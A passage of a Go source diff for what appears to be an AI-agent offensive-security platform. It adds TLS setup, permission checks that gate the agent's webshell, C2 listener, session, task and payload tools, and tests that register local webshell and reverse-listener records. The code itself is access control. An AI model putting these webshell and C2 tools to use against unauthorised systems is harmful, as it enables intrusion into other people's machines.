httpsResp, err := client.Get("https://" + addr + "/") + if err != nil { + t.Fatalf("https get: %v", err) + } + defer httpsResp.Body.Close() + if httpsResp.StatusCode != http.StatusOK { + t.Fatalf("https status = %d, want %d", httpsResp.StatusCode, http.StatusOK) + } + body, _ := io.ReadAll(httpsResp.Body) + if string(body) != "ok" { + t.Fatalf("body = %q, want ok", body) + } +} diff --git a/internal/app/main_server_tls.go b/internal/app/main_server_tls.go new file mode 100644 index 00000000..19b546d6 --- /dev/null +++ b/internal/app/main_server_tls.go @@ -0,0 +1,86 @@ +package app + +import ( + "crypto/ecdsa" + "crypto/elliptic" + "crypto/rand" + "crypto/tls" + "crypto/x509" + "crypto/x509/pkix" + "encoding/pem" + "fmt" + "math/big" + "net" + "strings" + "time" + + "cyberstrike-ai/internal/config" +) + +// mainTLSMode 主 Web 服务 TLS 启动方式。 +type mainTLSMode int + +const ( + mainTLSOff mainTLSMode = iota + mainTLSFromFiles + mainTLSInMemorySelfSigned +) + +// prepareMainServerTLS 根据 server 配置决定主站是否启用 HTTPS(及 HTTP/2 协商)。 +// fromFiles:使用 tls_cert_path + tls_key_path,由 http.Server.ListenAndServeTLS 加载 PEM。 +// inMemory:tls_auto_self_sign 生成的自签证书,仅用于本地/测试。 +func prepareMainServerTLS(cfg *config.ServerConfig) (mode mainTLSMode, tlsConf *tls.Config, certFile, keyFile string, err error) { + if cfg == nil || !config.MainWebUIUsesHTTPS(cfg) { + return mainTLSOff, nil, "", "", nil + } + certFile = strings.TrimSpace(cfg.TLSCertPath) + keyFile = strings.TrimSpace(cfg.TLSKeyPath) + if certFile != "" && keyFile != "" { + // 证书由 ListenAndServeTLS 从文件加载;此处仅提供最小 TLS 配置供 http2.ConfigureServer 合并 ALPN。 + return mainTLSFromFiles, &tls.Config{MinVersion: tls.VersionTLS12}, certFile, keyFile, nil + } + if cfg.TLSAutoSelfSign { + cert, genErr := generateMainServerSelfSignedCert() + if genErr != nil { + return mainTLSOff, nil, "", "", fmt.Errorf("生成自签 TLS 证书: %w", genErr) + } + tlsConf = &tls.Config{ + MinVersion: tls.VersionTLS12, + Certificates: []tls.Certificate{cert}, + } + return mainTLSInMemorySelfSigned, tlsConf, "", "", nil + } + return mainTLSOff, nil, "", "", fmt.Errorf("server: 已启用 TLS(tls_enabled / tls_auto_self_sign / 证书路径),请设置 tls_cert_path 与 tls_key_path,或将 tls_auto_self_sign 设为 true(仅测试环境)") +} + +func generateMainServerSelfSignedCert() (tls.Certificate, error) { + priv, err := ecdsa.GenerateKey(elliptic.P256(), rand.Reader) + if err != nil { + return tls.Certificate{}, err + } + serial, err := rand.Int(rand.Reader, big.NewInt(1<<62)) + if err != nil { + return tls.Certificate{}, err + } + tmpl := &x509.Certificate{ + SerialNumber: serial, + Subject: pkix.Name{CommonName: "CyberStrikeAI"}, + NotBefore: time.Now().Add(-1 * time.Hour), + NotAfter: time.Now().Add(365 * 24 * time.Hour), + KeyUsage: x509.KeyUsageDigitalSignature, + ExtKeyUsage: []x509.ExtKeyUsage{x509.ExtKeyUsageServerAuth}, + IPAddresses: []net.IP{net.ParseIP("127.0.0.1"), net.ParseIP("::1")}, + DNSNames: []string{"localhost"}, + } + der, err := x509.CreateCertificate(rand.Reader, tmpl, tmpl, &priv.PublicKey, priv) + if err != nil { + return tls.Certificate{}, err + } + keyDER, err := x509.MarshalECPrivateKey(priv) + if err != nil { + return tls.Certificate{}, err + } + certPEM := pem.EncodeToMemory(&pem.Block{Type: "CERTIFICATE", Bytes: der}) + keyPEM := pem.EncodeToMemory(&pem.Block{Type: "EC PRIVATE KEY", Bytes: keyDER}) + return tls.X509KeyPair(certPEM, keyPEM) +} diff --git a/internal/app/mcp_authorization.go b/internal/app/mcp_authorization.go new file mode 100644 index 00000000..6526de7d --- /dev/null +++ b/internal/app/mcp_authorization.go @@ -0,0 +1,407 @@ +package app + +import ( + "context" + "fmt" + "strings" + + "cyberstrike-ai/internal/agent" + "cyberstrike-ai/internal/authctx" + "cyberstrike-ai/internal/database" + "cyberstrike-ai/internal/mcp" + "cyberstrike-ai/internal/mcp/builtin" +) + +func mcpToolAuthorizer(db *database.DB) func(context.Context, string, map[string]interface{}) error { + return func(ctx context.Context, toolName string, args map[string]interface{}) error { + principal, ok := authctx.PrincipalFromContext(ctx) + if !ok { + return fmt.Errorf("missing authenticated principal") + } + require := func(permission string) error { + if !principal.HasPermission(permission) { + return fmt.Errorf("missing permission %s", permission) + } + return nil + } + resource := func(permission, resourceType, argument string) error { + if err := require(permission); err != nil { + return err + } + id := mcpAuthorizationString(args, argument) + if id == "" || db == nil || !db.UserCanAccessResource(principal.UserID, principal.ScopeFor(permission), resourceType, id) { + return fmt.Errorf("no access to %s %s", resourceType, id) + } + if err := authorizeMCPProjectResourceBoundary(ctx, db, resourceType, id); err != nil { + return err + } + return nil + } + toolExecutionResource := func(permission string) error { + if err := require(permission); err != nil { + return err + } + id := mcpAuthorizationString(args, "execution_id") + if id == "" || db == nil || !db.UserCanAccessToolExecution(principal.UserID, principal.ScopeFor(permission), id) { + return fmt.Errorf("no access to tool execution %s", id) + } + return nil + } + + switch toolName { + case builtin.ToolWebshellExec, builtin.ToolWebshellFileWrite: + return resource("webshell:write", "webshell", "connection_id") + case builtin.ToolWebshellFileList, builtin.ToolWebshellFileRead: + return resource("webshell:read", "webshell", "connection_id") + case builtin.ToolManageWebshellList: + return require("webshell:read") + case builtin.ToolManageWebshellAdd: + return require("webshell:write") + case builtin.ToolManageWebshellUpdate, builtin.ToolManageWebshellTest: + return resource("webshell:write", "webshell", "connection_id") + case builtin.ToolManageWebshellDelete: + return resource("webshell:delete", "webshell", "connection_id") + case builtin.ToolRecordVulnerability: + if err := require("vulnerability:write"); err != nil { + return err + } + conversationID := mcpAuthorizationString(args, "conversation_id") + if conversationID == "" { + conversationID = mcpAuthorizationConversationID(ctx) + } + if conversationID == "" || db == nil || !db.UserCanAccessResource(principal.UserID, principal.ScopeFor("vulnerability:write"), "conversation", conversationID) { + return fmt.Errorf("no access to conversation %s", conversationID) + } + return nil + case builtin.ToolListVulnerabilities: + if err := require("vulnerability:read"); err != nil { + return err + } + conversationID := mcpAuthorizationConversationID(ctx) + if conversationID == "" || db == nil || !db.UserCanAccessResource(principal.UserID, principal.ScopeFor("vulnerability:read"), "conversation", conversationID) { + return fmt.Errorf("no access to conversation %s", conversationID) + } + return nil + case builtin.ToolGetVulnerability: + return resource("vulnerability:read", "vulnerability", "id") + case builtin.ToolQueryAssets: + return require("asset:read") + case builtin.ToolGetAsset: + return resource("asset:read", "asset", "id") + case builtin.ToolCreateAsset: + if err := require("asset:write"); err != nil { + return err + } + if projectID := mcpAuthorizationString(args, "project_id"); projectID != "" && (db == nil || !db.UserCanAccessResource(principal.UserID, principal.ScopeFor("asset:write"), "project", projectID)) { + return fmt.Errorf("no access to project %s", projectID) + } + return nil + case builtin.ToolUpdateAsset, builtin.ToolCompleteAssetScan: + if err := resource("asset:write", "asset", "id"); err != nil { + return err + } + if toolName == builtin.ToolCompleteAssetScan { + conversationID := mcpAuthorizationConversationID(ctx) + if conversationID == "" || db == nil || !db.UserCanAccessResource(principal.UserID, principal.ScopeFor("asset:write"), "conversation", conversationID) { + return fmt.Errorf("no access to conversation %s", conversationID) + } + return nil + } + if projectID := mcpAuthorizationString(args, "project_id"); projectID != "" && (db == nil || !db.UserCanAccessResource(principal.UserID, principal.ScopeFor("asset:write"), "project", projectID)) { + return fmt.Errorf("no access to project %s", projectID) + } + return nil + case builtin.ToolDeleteAsset: + return resource("asset:delete", "asset", "id") + case builtin.ToolUpsertProjectFact, builtin.ToolDeprecateProjectFact, builtin.ToolRestoreProjectFact: + return authorizeProjectTool(ctx, principal, db, "project:write") + case builtin.ToolGetProjectFact, builtin.ToolListProjectFacts, builtin.ToolSearchProjectFacts: + return authorizeProjectTool(ctx, principal, db, "project:read") + case builtin.ToolListKnowledgeRiskTypes, builtin.ToolSearchKnowledgeBase: + return require("knowledge:read") + case builtin.ToolAnalyzeImage: + return require("agent:execute") + case builtin.ToolGetToolExecution, builtin.ToolWaitToolExecution: + return toolExecutionResource("monitor:read") + case builtin.ToolCancelToolExecution: + return toolExecutionResource("monitor:write") + case builtin.ToolBatchTaskList: + return require("tasks:read") + case builtin.ToolBatchTaskGet: + return resource("tasks:read", "batch_task", "queue_id") + case builtin.ToolBatchTaskCreate: + if err := require("tasks:write"); err != nil { + return err + } + if projectID := mcpAuthorizationString(args, "project_id"); projectID != "" && (db == nil || !db.UserCanAccessResource(principal.UserID, principal.ScopeFor("tasks:write"), "project", projectID)) { + return fmt.Errorf("no access to project %s", projectID) + } + return nil + case builtin.ToolBatchTaskDelete, builtin.ToolBatchTaskRemove: + return resource("tasks:delete", "batch_task", "queue_id") + case builtin.ToolBatchTaskStart, builtin.ToolBatchTaskRerun, builtin.ToolBatchTaskPause, + builtin.ToolBatchTaskUpdateMetadata, builtin.ToolBatchTaskUpdateSchedule, + builtin.ToolBatchTaskScheduleEnabled, builtin.ToolBatchTaskAdd, builtin.ToolBatchTaskUpdate: + return resource("tasks:write", "batch_task", "queue_id") + case builtin.ToolC2Listener: + return authorizeC2Action(ctx, principal, db, args, "c2_listener", "listener_id") + case builtin.ToolC2Session, builtin.ToolC2Task, builtin.ToolC2File: + if toolName == builtin.ToolC2File && mcpAuthorizationString(args, "action") == "get_result" { + return authorizeC2Action(ctx, principal, db, args, "c2_task", "task_id") + } + return authorizeC2Action(ctx, principal, db, args, "c2_session", "session_id") + case builtin.ToolC2TaskManage: + return authorizeC2Action(ctx, principal, db, args, "c2_task", "task_id") + case builtin.ToolC2Payload: + return resource("c2:write", "c2_listener", "listener_id") + case builtin.ToolC2Event: + if id := mcpAuthorizationString(args, "session_id"); id != "" { + return resource("c2:read", "c2_session", "session_id") + } + if id := mcpAuthorizationString(args, "task_id"); id != "" { + return resource("c2:read", "c2_task", "task_id") + } + if filter := mcpEffectiveProjectFilter(ctx, db); filter != "" { + return require("c2:read") + } + if principal.ScopeFor("c2:read") != database.RBACScopeAll { + return fmt.Errorf("unfiltered C2 event list requires global scope") + } + return require("c2:read") + case builtin.ToolC2Profile: + // Profiles are process-global and do not yet have an owner. Writes are + // therefore reserved for global scope; reads require c2:read. + if mcpAuthorizationString(args, "action") == "list" || mcpAuthorizationString(args, "action") == "get" { + return require("c2:read") + } + permission := "c2:write" + if mcpAuthorizationString(args, "action") == "delete" { + permission = "c2:delete" + } + if principal.ScopeFor(permission) != database.RBACScopeAll { + return fmt.Errorf("C2 profile mutation requires global scope") + } + if mcpAuthorizationString(args, "action") == "delete" { + return require("c2:delete") + } + return require("c2:write") + default: + if builtin.IsBuiltinTool(toolName) { + return fmt.Errorf("no authorization policy registered for builtin tool %s", toolName) + } + if principal.HasPermission("agent:local-execute") { + return nil + } + return fmt.Errorf("missing agent:local-execute") + } + } +} + +func externalMCPToolAuthorizer() func(context.Context, string, map[string]interface{}) error { + return func(ctx context.Context, toolName string, _ map[string]interface{}) error { + principal, ok := authctx.PrincipalFromContext(ctx) + if !ok { + return fmt.Errorf("missing authenticated principal") + } + if !principal.HasPermission("mcp:external:execute") { + return fmt.Errorf("missing permission mcp:external:execute") + } + if principal.ScopeFor("mcp:external:execute") != database.RBACScopeAll { + return fmt.Errorf("external MCP invocation requires global scope") + } + if strings.TrimSpace(toolName) == "" { + return fmt.Errorf("missing external tool name") + } + return nil + } +} + +func authorizeC2Action(ctx context.Context, principal authctx.Principal, db *database.DB, args map[string]interface{}, resourceType, argument string) error { + action := mcpAuthorizationString(args, "action") + permission := "c2:write" + if action == "list" || action == "get" || action == "get_result" || action == "wait" { + permission = "c2:read" + } else if action == "delete" || action == "delete_batch" { + permission = "c2:delete" + } + if !principal.HasPermission(permission) { + return fmt.Errorf("missing permission %s", permission) + } + id := mcpAuthorizationString(args, argument) + if action == "delete_batch" { + ids := mcpAuthorizationStrings(args, argument+"s") + if len(ids) == 0 { + return fmt.Errorf("missing resource identifiers %ss", argument) + } + for _, candidate := range ids { + if db == nil || !db.UserCanAccessResource(principal.UserID, principal.ScopeFor(permission), resourceType, candidate) { + return fmt.Errorf("no access to %s %s", resourceType, candidate) + } + if err := authorizeMCPProjectResourceBoundary(ctx, db, resourceType, candidate); err != nil { + return err + } + } + return nil + } + if id == "" { + if action == "create" { + projectID := mcpAuthorizationString(args, "project_id") + if projectID == "" { + projectID = mcpEffectiveProjectFilter(ctx, db) + if projectID == database.ProjectFilterUnbound { + projectID = "" + } + } + if projectID != "" && (db == nil || !db.UserCanAccessResource(principal.UserID, principal.ScopeFor(permission), "project", projectID)) { + return fmt.Errorf("no access to project %s", projectID) + } + return nil + } + if action == "list" { + return nil + } + return fmt.Errorf("missing resource identifier %s", argument) + } + if db == nil || !db.UserCanAccessResource(principal.UserID, principal.ScopeFor(permission), resourceType, id) { + return fmt.Errorf("no access to %s %s", resourceType, id) + } + if err := authorizeMCPProjectResourceBoundary(ctx, db, resourceType, id); err != nil { + return err + } + return nil +} + +func authorizeMCPProjectResourceBoundary(ctx context.Context, db *database.DB, resourceType, resourceID string) error { + filter := mcpEffectiveProjectFilter(ctx, db) + if filter == "" || db == nil { + return nil + } + projectID, ok, err := mcpResourceProjectID(db, resourceType, resourceID) + if err != nil { + return err + } + if !ok { + return nil + } + if filter == database.ProjectFilterUnbound { + if projectID != "" { + return fmt.Errorf("resource %s %s belongs to project %s, current conversation is unbound", resourceType, resourceID, projectID) + } + return nil + } + if projectID != filter { + if projectID == "" { + return fmt.Errorf("resource %s %s is unbound, current conversation project is %s", resourceType, resourceID, filter) + } + return fmt.Errorf("resource %s %s belongs to project %s, current conversation project is %s", resourceType, resourceID, projectID, filter) + } + return nil +} + +func mcpResourceProjectID(db *database.DB, resourceType, resourceID string) (string, bool, error) { + switch resourceType { + case "webshell": + conn, err := db.GetWebshellConnection(resourceID) + if err != nil { + return "", true, err + } + if conn == nil { + return "", true, fmt.Errorf("webshell not found") + } + return strings.TrimSpace(conn.ProjectID), true, nil + case "c2_listener": + listener, err := db.GetC2Listener(resourceID) + if err != nil { + return "", true, err + } + if listener == nil { + return "", true, fmt.Errorf("listener not found") + } + return strings.TrimSpace(listener.ProjectID), true, nil + case "c2_session": + session, err := db.GetC2Session(resourceID) + if err != nil { + return "", true, err + } + if session == nil { + return "", true, fmt.Errorf("session not found") + } + return mcpResourceProjectID(db, "c2_listener", session.ListenerID) + case "c2_task": + task, err := db.GetC2Task(resourceID) + if err != nil { + return "", true, err + } + if task == nil { + return "", true, fmt.Errorf("task not found") + } + return mcpResourceProjectIDFromC2Session(db, task.SessionID) + default: + return "", false, nil + } +} + +func mcpResourceProjectIDFromC2Session(db *database.DB, sessionID string) (string, bool, error) { + session, err := db.GetC2Session(sessionID) + if err != nil { + return "", true, err + } + if session == nil { + return "", true, fmt.Errorf("session not found") + } + return mcpResourceProjectID(db, "c2_listener", session.ListenerID) +} + +func mcpAuthorizationStrings(args map[string]interface{}, key string) []string { + values := []string{} + switch raw := args[key].(type) { + case []string: + for _, value := range raw { + if value = strings.TrimSpace(value); value != "" { + values = append(values, value) + } + } + case []interface{}: + for _, item := range raw { + if value, ok := item.(string); ok { + if value = strings.TrimSpace(value); value != "" { + values = append(values, value) + } + } + } + } + return values +} + +func authorizeProjectTool(ctx context.Context, principal authctx.Principal, db *database.DB, permission string) error { + if !principal.HasPermission(permission) { + return fmt.Errorf("missing permission %s", permission) + } + conversationID := mcpAuthorizationConversationID(ctx) + if conversationID == "" || db == nil || !db.UserCanAccessResource(principal.UserID, principal.ScopeFor(permission), "conversation", conversationID) { + return fmt.Errorf("no access to conversation %s", conversationID) + } + projectID, err := db.GetConversationProjectID(conversationID) + if err != nil { + return fmt.Errorf("no access to project: %w", err) + } + if strings.TrimSpace(projectID) == "" { + return fmt.Errorf("当前对话未绑定项目,无法使用项目黑板工具,请先在对话中选择项目或创建带项目的对话") + } + if !db.UserCanAccessResource(principal.UserID, principal.ScopeFor(permission), "project", projectID) { + return fmt.Errorf("no access to project %s", projectID) + } + return nil +} + +func mcpAuthorizationConversationID(ctx context.Context) string { + if id := strings.TrimSpace(agent.ConversationIDFromContext(ctx)); id != "" { + return id + } + return strings.TrimSpace(mcp.MCPConversationIDFromContext(ctx)) +} + +func mcpAuthorizationString(args map[string]interface{}, key string) string { + value, _ := args[key].(string) + return strings.TrimSpace(value) +} diff --git a/internal/app/mcp_authorization_test.go b/internal/app/mcp_authorization_test.go new file mode 100644 index 00000000..e4bfdc44 --- /dev/null +++ b/internal/app/mcp_authorization_test.go @@ -0,0 +1,261 @@ +package app + +import ( + "context" + "path/filepath" + "strings" + "testing" + "time" + + "cyberstrike-ai/internal/authctx" + "cyberstrike-ai/internal/database" + "cyberstrike-ai/internal/mcp" + "cyberstrike-ai/internal/mcp/builtin" + "cyberstrike-ai/internal/security" + + "go.uber.org/zap" +) + +func TestMCPToolAuthorizerEnforcesPermissionAndResource(t *testing.T) { + db, err := database.NewDB(filepath.Join(t.TempDir(), "mcp-authz.db"), zap.NewNop()) + if err != nil { + t.Fatal(err) + } + defer db.Close() + user, err := db.CreateRBACUser("mcp-user", "MCP User", "hash", true, nil) + if err != nil { + t.Fatal(err) + } + for _, id := range []string{"ws_allowed", "ws_hidden"} { + if err := db.CreateWebshellConnection(&database.WebShellConnection{ID: id, URL: "http://127.0.0.1/" + id, Type: "php", Method: "post", CmdParam: "cmd", CreatedAt: time.Now()}); err != nil { + t.Fatal(err) + } + } + if err := db.AssignResourceToUser(user.ID, "webshell", "ws_allowed"); err != nil { + t.Fatal(err) + } + + principal := authctx.NewPrincipal(user.ID, user.Username, database.RBACScopeAssigned, map[string]bool{"mcp:write": true, "webshell:write": true}) + ctx := authctx.WithPrincipal(context.Background(), principal) + authorize := mcpToolAuthorizer(db) + if err := authorize(ctx, builtin.ToolWebshellExec, map[string]interface{}{"connection_id": "ws_allowed"}); err != nil { + t.Fatalf("allowed resource denied: %v", err) + } + if err := authorize(ctx, builtin.ToolWebshellExec, map[string]interface{}{"connection_id": "ws_hidden"}); err == nil { + t.Fatal("foreign webshell resource was allowed") + } + if err := authorize(ctx, builtin.ToolManageWebshellDelete, map[string]interface{}{"connection_id": "ws_allowed"}); err == nil { + t.Fatal("delete without webshell:delete was allowed") + } +} + +func TestMCPToolAuthorizerEnforcesConversationProjectBoundary(t *testing.T) { + db, err := database.NewDB(filepath.Join(t.TempDir(), "mcp-project-boundary.db"), zap.NewNop()) + if err != nil { + t.Fatal(err) + } + defer db.Close() + user, err := db.CreateRBACUser("boundary-user", "Boundary User", "hash", true, nil) + if err != nil { + t.Fatal(err) + } + project, err := db.CreateProject(&database.Project{Name: "Project 123"}) + if err != nil { + t.Fatal(err) + } + projectConv, err := db.CreateConversation("project conversation", database.ConversationCreateMeta{ProjectID: project.ID}) + if err != nil { + t.Fatal(err) + } + unboundConv, err := db.CreateConversation("unbound conversation", database.ConversationCreateMeta{}) + if err != nil { + t.Fatal(err) + } + + wsProject := database.WebShellConnection{ID: "ws_project", ProjectID: project.ID, URL: "http://127.0.0.1/project.php", Type: "php", Method: "post", CreatedAt: time.Now()} + wsUnbound := database.WebShellConnection{ID: "ws_unbound", URL: "http://127.0.0.1/unbound.php", Type: "php", Method: "post", CreatedAt: time.Now()} + if err := db.CreateWebshellConnection(&wsProject); err != nil { + t.Fatal(err) + } + if err := db.CreateWebshellConnection(&wsUnbound); err != nil { + t.Fatal(err) + } + for _, id := range []string{wsProject.ID, wsUnbound.ID} { + if err := db.AssignResourceToUser(user.ID, "webshell", id); err != nil { + t.Fatal(err) + } + } + + now := time.Now() + listener := &database.C2Listener{ID: "l_project", ProjectID: project.ID, Name: "project listener", Type: "tcp_reverse", BindHost: "127.0.0.1", BindPort: 5555, OwnerUserID: user.ID, CreatedAt: now} + if err := db.CreateC2Listener(listener); err != nil { + t.Fatal(err) + } + if err := db.AssignResourceToUser(user.ID, "c2_listener", listener.ID); err != nil { + t.Fatal(err) + } + session := &database.C2Session{ID: "s_project", ListenerID: listener.ID, ImplantUUID: "implant-project", Status: "active", FirstSeenAt: now, LastCheckIn: now} + if err := db.UpsertC2Session(session); err != nil { + t.Fatal(err) + } + + principal := authctx.NewPrincipal(user.ID, user.Username, database.RBACScopeAssigned, map[string]bool{ + "webshell:read": true, "webshell:write": true, + "c2:read": true, "c2:write": true, + }) + authorize := mcpToolAuthorizer(db) + unboundCtx := authctx.WithPrincipal(mcp.WithMCPConversationID(context.Background(), unboundConv.ID), principal) + projectCtx := authctx.WithPrincipal(mcp.WithMCPProjectID(mcp.WithMCPConversationID(context.Background(), projectConv.ID), project.ID), principal) + projectCtxFromConversationOnly := authctx.WithPrincipal(mcp.WithMCPConversationID(context.Background(), projectConv.ID), principal) + + if err := authorize(unboundCtx, builtin.ToolWebshellExec, map[string]interface{}{"connection_id": wsProject.ID}); err == nil { + t.Fatal("unbound conversation was allowed to use project-bound webshell") + } + if err := authorize(unboundCtx, builtin.ToolWebshellExec, map[string]interface{}{"connection_id": wsUnbound.ID}); err != nil { + t.Fatalf("unbound webshell denied in unbound conversation: %v", err) + } + if err := authorize(projectCtx, builtin.ToolWebshellExec, map[string]interface{}{"connection_id": wsProject.ID}); err != nil { + t.Fatalf("project webshell denied in project conversation: %v", err) + } + if err := authorize(projectCtxFromConversationOnly, builtin.ToolWebshellExec, map[string]interface{}{"connection_id": wsProject.ID}); err != nil { + t.Fatalf("project webshell denied when only conversation id is present: %v", err) + } + if err := authorize(projectCtx, builtin.ToolWebshellExec, map[string]interface{}{"connection_id": wsUnbound.ID}); err == nil { + t.Fatal("project conversation was allowed to use unbound webshell by id") + } + if err := authorize(unboundCtx, builtin.ToolC2Session, map[string]interface{}{"action": "get", "session_id": session.ID}); err == nil { + t.Fatal("unbound conversation was allowed to use project-bound c2 session") + } + if err := authorize(projectCtx, builtin.ToolC2Session, map[string]interface{}{"action": "get", "session_id": session.ID}); err != nil { + t.Fatalf("project c2 session denied in project conversation: %v", err) + } + if err := authorize(projectCtxFromConversationOnly, builtin.ToolC2Session, map[string]interface{}{"action": "get", "session_id": session.ID}); err != nil { + t.Fatalf("project c2 session denied when only conversation id is present: %v", err) + } +} + +func TestEveryBuiltinMCPToolHasExplicitAuthorizationPolicy(t *testing.T) { + db, err := database.NewDB(filepath.Join(t.TempDir(), "mcp-policy-inventory.db"), zap.NewNop()) + if err != nil { + t.Fatal(err) + } + defer db.Close() + permissions := map[string]bool{} + for permission := range security.PermissionCatalog { + permissions[permission] = true + } + ctx := authctx.WithPrincipal(context.Background(), authctx.NewPrincipal("admin", "admin", database.RBACScopeAll, permissions)) + authorize := mcpToolAuthorizer(db) + args := map[string]interface{}{ + "action": "get", "connection_id": "x", "queue_id": "x", "listener_id": "x", + "session_id": "x", "task_id": "x", "id": "x", "conversation_id": "x", "execution_id": "x", + } + for _, toolName := range builtin.GetAllBuiltinTools() { + err := authorize(ctx, toolName, args) + if err != nil && strings.Contains(err.Error(), "no authorization policy registered") { + t.Errorf("builtin tool %s has no explicit policy", toolName) + } + } +} + +func TestMCPExecutionControlAuthorizationUsesExecutionScope(t *testing.T) { + db, err := database.NewDB(filepath.Join(t.TempDir(), "mcp-exec-authz.db"), zap.NewNop()) + if err != nil { + t.Fatal(err) + } + defer db.Close() + user, err := db.CreateRBACUser("exec-user", "Exec User", "hash", true, nil) + if err != nil { + t.Fatal(err) + } + if err := db.SaveToolExecution(&mcp.ToolExecution{ + ID: "exec-owned", + ToolName: "lab::slow", + Status: "running", + StartTime: time.Now(), + OwnerUserID: user.ID, + }); err != nil { + t.Fatal(err) + } + if err := db.SaveToolExecution(&mcp.ToolExecution{ + ID: "exec-hidden", + ToolName: "lab::slow", + Status: "running", + StartTime: time.Now(), + }); err != nil { + t.Fatal(err) + } + + principal := authctx.NewPrincipal(user.ID, user.Username, database.RBACScopeAssigned, map[string]bool{"monitor:read": true, "monitor:write": true}) + ctx := authctx.WithPrincipal(context.Background(), principal) + authorize := mcpToolAuthorizer(db) + if err := authorize(ctx, builtin.ToolWaitToolExecution, map[string]interface{}{"execution_id": "exec-owned"}); err != nil { + t.Fatalf("owned execution denied: %v", err) + } + if err := authorize(ctx, builtin.ToolCancelToolExecution, map[string]interface{}{"execution_id": "exec-hidden"}); err == nil { + t.Fatal("foreign execution was allowed") + } +} + +func TestMCPAssetToolAuthorizationUsesAssetPermissionsAndScope(t *testing.T) { + db, err := database.NewDB(filepath.Join(t.TempDir(), "mcp-asset-authz.db"), zap.NewNop()) + if err != nil { + t.Fatal(err) + } + defer db.Close() + user, err := db.CreateRBACUser("asset-user", "Asset User", "hash", true, nil) + if err != nil { + t.Fatal(err) + } + owned := &database.Asset{IP: "192.0.2.10", Port: 443, Protocol: "https"} + hidden := &database.Asset{IP: "192.0.2.20", Port: 443, Protocol: "https"} + if _, err := db.UpsertAssets([]*database.Asset{owned}, user.ID); err != nil { + t.Fatal(err) + } + if _, err := db.UpsertAssets([]*database.Asset{hidden}, ""); err != nil { + t.Fatal(err) + } + + permissions := map[string]bool{"asset:read": true, "asset:write": true} + ctx := authctx.WithPrincipal(context.Background(), authctx.NewPrincipal(user.ID, user.Username, database.RBACScopeAssigned, permissions)) + authorize := mcpToolAuthorizer(db) + if err := authorize(ctx, builtin.ToolQueryAssets, nil); err != nil { + t.Fatalf("asset query denied: %v", err) + } + if err := authorize(ctx, builtin.ToolGetAsset, map[string]interface{}{"id": owned.ID}); err != nil { + t.Fatalf("owned asset denied: %v", err) + } + if err := authorize(ctx, builtin.ToolGetAsset, map[string]interface{}{"id": hidden.ID}); err == nil { + t.Fatal("unassigned asset was readable") + } + if err := authorize(ctx, builtin.ToolUpdateAsset, map[string]interface{}{"id": owned.ID}); err != nil { + t.Fatalf("owned asset update denied: %v", err) + } + if err := authorize(ctx, builtin.ToolDeleteAsset, map[string]interface{}{"id": owned.ID}); err == nil { + t.Fatal("asset delete without asset:delete was allowed") + } +} + +func TestExternalMCPRequiresDedicatedPermission(t *testing.T) { + authorize := externalMCPToolAuthorizer() + ctx := authctx.WithPrincipal(context.Background(), authctx.NewPrincipal("u1", "user", database.RBACScopeAssigned, map[string]bool{"agent:execute": true})) + if err := authorize(ctx, "server::tool", nil); err == nil { + t.Fatal("agent:execute alone authorized an external MCP tool") + } + ctx = authctx.WithPrincipal(context.Background(), authctx.NewPrincipal("u1", "user", database.RBACScopeAll, map[string]bool{"mcp:external:execute": true})) + if err := authorize(ctx, "server::tool", nil); err != nil { + t.Fatalf("dedicated external MCP permission rejected: %v", err) + } +} + +func TestConfiguredCommandToolRequiresLocalExecutePermission(t *testing.T) { + authorize := mcpToolAuthorizer(nil) + agentOnly := authctx.WithPrincipal(context.Background(), authctx.NewPrincipal("u1", "user", database.RBACScopeAssigned, map[string]bool{"agent:execute": true})) + if err := authorize(agentOnly, "nmap_scan", nil); err == nil { + t.Fatal("agent:execute alone authorized a configured command tool") + } + local := authctx.WithPrincipal(context.Background(), authctx.NewPrincipal("u1", "user", database.RBACScopeAssigned, map[string]bool{"agent:local-execute": true})) + if err := authorize(local, "nmap_scan", nil); err != nil { + t.Fatalf("agent:local-execute rejected: %v", err) + } +} diff --git a/internal/app/mcp_http_auth_test.go b/internal/app/mcp_http_auth_test.go new file mode 100644 index 00000000..83ffbfc5 --- /dev/null +++ b/internal/app/mcp_http_auth_test.go @@ -0,0 +1,59 @@ +package app + +import ( + "bytes" + "net/http" + "net/http/httptest" + "path/filepath" + "testing" + + "cyberstrike-ai/internal/config" + "cyberstrike-ai/internal/database" + "cyberstrike-ai/internal/mcp" + "cyberstrike-ai/internal/security" + + "go.uber.org/zap" +) + +func TestStandaloneMCPPrefersUserRBACAndDisablesGlobalTokenByDefault(t *testing.T) { + db, err := database.NewDB(filepath.Join(t.TempDir(), "mcp-http-auth.db"), zap.NewNop()) + if err != nil { + t.Fatal(err) + } + t.Cleanup(func() { _ = db.Close() }) + auth := security.NewAuthManager(12) + if _, err := auth.AttachRBACStore(db); err != nil { + t.Fatal(err) + } + hash, err := security.HashPassword("admin-secret") + if err != nil { + t.Fatal(err) + } + if err := db.UpdateRBACAdminPassword(hash); err != nil { + t.Fatal(err) + } + token, _, err := auth.Authenticate("admin", "admin-secret") + if err != nil { + t.Fatal(err) + } + server := mcp.NewServer(zap.NewNop()) + server.SetToolAuthorizer(mcpToolAuthorizer(db)) + a := &App{config: &config.Config{MCP: config.MCPConfig{AuthHeader: "X-MCP-Token", AuthHeaderValue: "static-secret"}}, auth: auth, mcpServer: server} + body := []byte(`{"jsonrpc":"2.0","id":1,"method":"tools/list"}`) + + userReq := httptest.NewRequest(http.MethodPost, "/mcp", bytes.NewReader(body)) + userReq.Header.Set("Authorization", "Bearer "+token) + userW := httptest.NewRecorder() + a.mcpHandlerWithAuth(userW, userReq) + if userW.Code != http.StatusOK { + t.Fatalf("user bearer status = %d: %s", userW.Code, userW.Body.String()) + } + + staticReq := httptest.NewRequest(http.MethodPost, "/mcp", bytes.NewReader(body)) + staticReq.Header.Set("X-MCP-Token", "static-secret") + staticW := httptest.NewRecorder() + a.mcpHandlerWithAuth(staticW, staticReq) + if staticW.Code != http.StatusUnauthorized { + t.Fatalf("global static token status = %d, want 401", staticW.Code) + } +} diff --git a/internal/app/mcp_project_scope.go b/internal/app/mcp_project_scope.go new file mode 100644 index 00000000..171acbab --- /dev/null +++ b/internal/app/mcp_project_scope.go @@ -0,0 +1,26 @@ +package app + +import ( + "context" + "strings" + + "cyberstrike-ai/internal/database" + "cyberstrike-ai/internal/mcp" +) + +func mcpEffectiveProjectFilter(ctx context.Context, db *database.DB) string { + if projectID := strings.TrimSpace(mcp.MCPProjectIDFromContext(ctx)); projectID != "" { + return projectID + } + if conversationID := 